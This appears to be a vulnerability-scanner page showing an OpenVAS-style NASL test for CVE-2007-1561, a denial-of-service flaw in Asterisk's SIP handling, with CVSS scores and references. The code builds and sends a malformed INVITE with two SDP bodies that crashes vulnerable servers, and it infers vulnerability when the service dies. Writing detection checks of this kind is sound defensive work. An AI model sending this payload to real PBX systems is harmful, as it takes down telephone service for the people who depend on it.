6.4 Medium
AI Score
Confidence
Low
7.8 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:N/I:N/A:C
0.24 Low
EPSS
Percentile
96.5%
The remote Asterisk PBX SIP server is affected by an overflow
vulnerability.
# SPDX-FileCopyrightText: 2008 Ferdy Riphagen
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:digium:asterisk";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.9999992");
script_version("2023-12-19T05:05:25+0000");
script_tag(name:"last_modification", value:"2023-12-19 05:05:25 +0000 (Tue, 19 Dec 2023)");
script_tag(name:"creation_date", value:"2008-08-22 16:09:14 +0200 (Fri, 22 Aug 2008)");
script_tag(name:"cvss_base", value:"7.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:C");
script_cve_id("CVE-2007-1561");
script_tag(name:"qod_type", value:"remote_analysis");
script_tag(name:"solution_type", value:"VendorFix");
script_name("Asterisk PBX SDP Header Overflow Vulnerability");
script_category(ACT_DENIAL);
script_family("Denial of Service");
script_copyright("Copyright (C) 2008 Ferdy Riphagen");
script_dependencies("gb_digium_asterisk_sip_detect.nasl", "logins.nasl");
script_mandatory_keys("digium/asterisk/detected");
script_tag(name:"summary", value:"The remote Asterisk PBX SIP server is affected by an overflow
vulnerability.");
script_tag(name:"insight", value:"The application installed suffers from a remote overflow in the
SIP service resulting in a denial of service. An attacker can send a malformed INVITE packet with
two SDP headers, within the first header an existing IP address in the 'c=' variable and in the
second SDP header a NOT existing IP address in 'c='.");
script_tag(name:"impact", value:"This results in a segmentation fault in 'chan_sip.c' crashing the
Asterisk PBX service.");
script_tag(name:"solution", value:"Update to version 1.4.2/1.2.17 or later.");
script_xref(name:"URL", value:"http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/053052.html");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/23031");
script_xref(name:"URL", value:"http://bugs.digium.com/view.php?id=9321");
exit(0);
}
# Note :
# Because probably many systems running safe_asterisk as a watchdog for the asterisk pid, this check
# could be very false-negative prone. Additionally an INVITE message on secure systems need
# authentication, so this only works on systems using 'allowguest=yes' in sip.conf and for peers
# without authentication info with the use of an edited 'logins.nasl' (not supplied).
include("sip.inc");
include("host_details.inc");
include("misc_func.inc");
if( ! port = get_app_port( cpe:CPE ) )
exit( 0 );
if( ! infos = get_app_location_and_proto( cpe:CPE, port:port ) )
exit( 0 );
proto = infos["proto"];
if( ! sip_alive( port:port, proto:proto ) )
exit( 0 );
targethost = get_host_name();
thishost = this_host();
vtstrings = get_vt_strings();
user = vtstrings["lowercase"];
sdp_headers = string(
"v=0\r\n",
"o=somehost 12345 12345 IN IP4 ", targethost, "\r\n",
"c=IN IP4 ", targethost, "\r\n",
"m=audio 16384 RTP/AVP 8 0 18 101\r\n\r\n",
"v=1\r\n",
"o=somehost 12345 12345 IN IP4 ", targethost, "\r\n",
"c=IN IP4 555.x.555.x.555\r\n",
"m=audio 16384 RTP/AVP 8 0 18 101");
bad_invite = string(
"INVITE sip:", targethost, "\r\n",
"Via: SIP/2.0/", toupper( proto ), " ", thishost, ":", port, "\r\n",
"To: <sip:", user, "@", targethost, ":", port, ">\r\n",
"From: <sip:", user, "@", thishost, ":", port, ">\r\n",
"Call-ID: ", rand(), "\r\n",
"CSeq: ", rand(), " INVITE\r\n",
"Contact: <sip:", user, "@", thishost, ">\r\n",
"Max-Forwards: 0\r\n",
"Content-Type: application/sdp\r\n",
"Content-Length: ", strlen(sdp_headers), "\r\n\r\n",
sdp_headers);
exp = sip_send_recv( port:port, data:bad_invite, proto:proto );
if( isnull( exp ) ) {
if( ! sip_alive( port:port, proto:proto ) ) {
security_message( port:port, proto:proto );
exit( 0 );
}
}
exit( 99 );